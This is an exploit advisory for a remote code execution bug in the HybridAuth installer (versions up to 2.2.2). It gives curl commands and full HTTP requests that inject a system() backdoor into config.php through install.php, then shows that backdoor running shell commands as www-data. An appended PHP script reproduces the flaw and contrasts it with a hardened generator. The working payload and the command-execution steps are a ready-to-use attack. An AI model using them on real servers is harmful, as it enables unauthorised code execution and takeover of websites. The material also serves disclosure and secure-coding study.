######################################################################
# _     ___  _   _  ____  ____    _  _____
#| |   / _ \| \ | |/ ___|/ ___|  / \|_   _|
#| |  | | | |  \| | |  _| |     / _ \ | |
#| |__| |_| | |\  | |_| | |___ / ___ \| |
#|_____\___/|_| \_|\____|\____/_/   \_\_|
#
# HybridAuth <= 2.2.2 Remote Code Execution
# Website : http://hybridauth.sourceforge.net/
# Exploit Author : @u0x (Pichaya Morimoto)
# Release date : August 5, 2014
#
# Special Thanks to 2600 Thailand group
# https://www.facebook.com/groups/2600Thailand/ , http://2600.in.th/
#
########################################################################

[+] Description
============================================================

HybridAuth enables developers to easily build social applications that engage
website visitors and customers on a social level by implementing social
sign-in, social sharing, user profiles, friends lists, activity streams,
status updates and more.

[+] Exploit (New Version)
============================================================

I just found that the latest development version (2.2.2-dev) on GitHub tried
to patch this months ago.

https://github.com/hybridauth/hybridauth/commit/574953517cda02eb631d68879bbc4f203fd203b9#diff-7fa84e199bd97f30cea5aea71735379c

...
function stringSanitization($string) {
    $string = strip_tags($string);
    $string = htmlentities($string, ENT_QUOTES, 'UTF-8');
    return $string;
}
...
foreach( $_POST AS $k => $v ):
    $v = stringSanitization($v);   <--- sanitize ???
    $k = stringSanitization($k);   <--- sanitize ???
    $z = "#$k#";
    $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
endforeach;
...

However, the sanitization is not sufficient to prevent PHP code injection.
strip_tags() and htmlentities(ENT_QUOTES) only rewrite angle brackets,
ampersands and quotes, and the #OPENID_ADAPTER_STATUS# placeholder sits
unquoted in the template (it expects a bare true/false), so a payload that
needs none of those characters, such as system($_POST[0]))));/* below, passes
through the sanitizer untouched and is written into config.php as PHP source. :/

Note that the default installation leaves "install.php" in place, so the
installer stays reachable after setup.
$ curl http://victim/hybridauth/install.php -d 'OPENID_ADAPTER_STATUS=system($_POST[0]))));/*'
$ curl http://victim/hybridauth/config.php -d '0=id;ls -lha'

[+] Proof-of-Concept
============================================================

PoC Environment: Ubuntu 14.04, PHP 5.5.9, Apache 2.4.7

1. Inject Evil PHP Backdoor

POST /hybridauth_git/install.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

OPENID_ADAPTER_STATUS=system($_POST[0]))));/*

HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 02:13:52 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 2467
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

<!DOCTYPE html>
<html lang="en">
<head>
<title>HybridAuth Installer</title>
...

2. Gaining access to the PHP backdoor

POST /hybridauth_git/config.php HTTP/1.1
Host: localhost
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: th,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Content-Length: 14

0=id;ls%20-lha

HTTP/1.1 200 OK
Date: Tue, 05 Aug 2014 02:15:16 GMT
Server: Apache
X-Powered-By: PHP/5.5.9-1ubuntu4.3
Vary: Accept-Encoding
X-Content-Type-Options: nosniff
X-Frame-Options: sameorigin
Content-Length: 397
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html

uid=33(www-data) gid=33(www-data) groups=33(www-data)
total 76K
drwxrwxrwx  3 longcat longcat 4.0K Aug  5 08:34 .
drwxrwxr-x 25 longcat longcat  16K Aug  5 08:47 ..
drwxrwxrwx  5 longcat longcat 4.0K Aug  5 08:34 Hybrid
-rwxrwxrwx  1 longcat longcat 2.5K Aug  5 09:13 config.php
-rwxrwxrwx  1 longcat longcat  488 Aug  5 08:34 index.php
-rwxrwxrwx  1 longcat longcat  18K Aug  5 08:34 install.php

[+] Vulnerability Analysis
============================================================

Filename: ./install.php

...
function stringSanitization($string) {
    $string = strip_tags($string);
    $string = htmlentities($string, ENT_QUOTES, 'UTF-8');   <-- LoL
    return $string;
}
...
if( count( $_POST ) ):   <-- user controlled input: HTTP POST data

    \/-- Read a template file
    $CONFIG_TEMPLATE = file_get_contents( "Hybrid/resources/config.php.tpl" );

    foreach( $_POST AS $k => $v ):
        $v = stringSanitization($v);
        $k = stringSanitization($k);
        $z = "#$k#";

        \/-- #POST data's keys# found in the template file will be replaced with POST data's values,
         |   so we can simply replace these existing values with something fun :)
        $CONFIG_TEMPLATE = str_replace( $z, $v, $CONFIG_TEMPLATE );
    endforeach;
...
    \/-- write the substituted template contents into config.php
    $is_installed = file_put_contents( $GLOBAL_HYBRID_AUTH_PATH_BASE . "config.php",$CONFIG_TEMPLATE );
...

Filename: ./Hybrid/resources/config.php.tpl

...
return array(
    "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",
    "providers" => array (
        // openid providers
        "OpenID" => array (
            "enabled" => #OPENID_ADAPTER_STATUS#   <-- #..# will be replaced with arbitrary PHP code
        ),
...

So this is what the injected "config.php" looks like...

Filename: ./config.php

<?php
...
return array(
    "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",
    "providers" => array (
        // openid providers
        "OpenID" => array (
            "enabled" => system($_POST[0]))));/*
        ),
...

Pwned again,
LongCat
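The install.php substitution loop and the payload above, reduced to a stand-alone PHP script. This is an added example, not HybridAuth's code: the template is a trimmed, constructed stand-in for config.php.tpl, and the hardened generator beside it is an illustrative design (whitelist the placeholders, type-check each one, serialise the result with var_export()), not the project's own fix.

```php
<?php
// Added example, not HybridAuth's own code. Mirrors the install.php loop from
// the analysis above, runs the advisory's payload through it, and shows a
// generator that turns installer input into PHP literals instead of PHP source.

// Constructed stand-in for the relevant part of config.php.tpl. Note that
// #OPENID_ADAPTER_STATUS# is unquoted: the template expects a bare true/false.
$CONFIG_TEMPLATE = <<<'TPL'
<?php
return array(
    "base_url" => "#GLOBAL_HYBRID_AUTH_URL_BASE#",
    "providers" => array (
        "OpenID" => array (
            "enabled" => #OPENID_ADAPTER_STATUS#
        ),
    ),
);
TPL;

// Same sanitiser as install.php. htmlentities(ENT_QUOTES) rewrites only
// < > & " ' (and non-ASCII); every other byte reaches the template verbatim.
function stringSanitization($string) {
    $string = strip_tags($string);
    $string = htmlentities($string, ENT_QUOTES, 'UTF-8');
    return $string;
}

// Quick check for a candidate payload: does the sanitiser change it at all?
function survivesSanitizer($payload) {
    return stringSanitization($payload) === $payload;
}

// Vulnerable generator: the install.php loop, reduced to a function.
// Every POST key becomes a #KEY# search string; the value is spliced into source.
function buildConfigVulnerable($template, array $post) {
    foreach ($post as $k => $v) {
        $v = stringSanitization($v);
        $k = stringSanitization($k);
        $template = str_replace("#$k#", $v, $template);
    }
    return $template;
}

// Hardened generator (assumed design, not the project's fix): accept only the
// fields we expect, validate each by type, then serialise the whole config with
// var_export(), which emits quoted strings and bare true/false and nothing else.
function buildConfigHardened(array $post) {
    if (!isset($post['GLOBAL_HYBRID_AUTH_URL_BASE'], $post['OPENID_ADAPTER_STATUS'])) {
        throw new InvalidArgumentException('missing required installer field');
    }
    $baseUrl = $post['GLOBAL_HYBRID_AUTH_URL_BASE'];
    if (filter_var($baseUrl, FILTER_VALIDATE_URL) === false) {
        throw new InvalidArgumentException('GLOBAL_HYBRID_AUTH_URL_BASE is not a URL');
    }
    $status = $post['OPENID_ADAPTER_STATUS'];
    if ($status !== 'true' && $status !== 'false') {
        throw new InvalidArgumentException('OPENID_ADAPTER_STATUS must be "true" or "false"');
    }
    $config = array(
        'base_url'  => $baseUrl,
        'providers' => array(
            'OpenID' => array('enabled' => ($status === 'true')),
        ),
    );
    return "<?php\nreturn " . var_export($config, true) . ";\n";
}

// Constructed input: the advisory's payload exactly as install.php receives it.
$evil = array('OPENID_ADAPTER_STATUS' => 'system($_POST[0]))));/*');

var_dump(survivesSanitizer($evil['OPENID_ADAPTER_STATUS']));   // no <>&"' in it

// Vulnerable path: the payload lands where true/false should be, and the
// trailing /* comments out the rest of the generated file.
$out = buildConfigVulnerable($CONFIG_TEMPLATE, $evil);
echo $out, "\n";
var_dump(strpos($out, '"enabled" => system($_POST[0]))));/*') !== false);

// Hardened path: the same input is refused before anything is written.
try {
    buildConfigHardened($evil + array('GLOBAL_HYBRID_AUTH_URL_BASE' => 'http://localhost/hybridauth/'));
} catch (InvalidArgumentException $e) {
    echo "rejected: ", $e->getMessage(), "\n";
}
echo buildConfigHardened(array(
    'GLOBAL_HYBRID_AUTH_URL_BASE' => 'http://localhost/hybridauth/',
    'OPENID_ADAPTER_STATUS'       => 'true',
));
```

Run it with `php example.php`. The vulnerable path prints a config.php in which system($_POST[0]) sits in the "enabled" slot; the hardened path rejects the same input because OPENID_ADAPTER_STATUS is not one of the two accepted literals, and for valid input it emits a file whose only user-derived content is a var_export()-quoted string. The rule the example illustrates: HTML encoding is the wrong tool for a PHP-source sink, so never splice request data into source text at all; build a data structure, serialise it, and remove install.php once setup is complete.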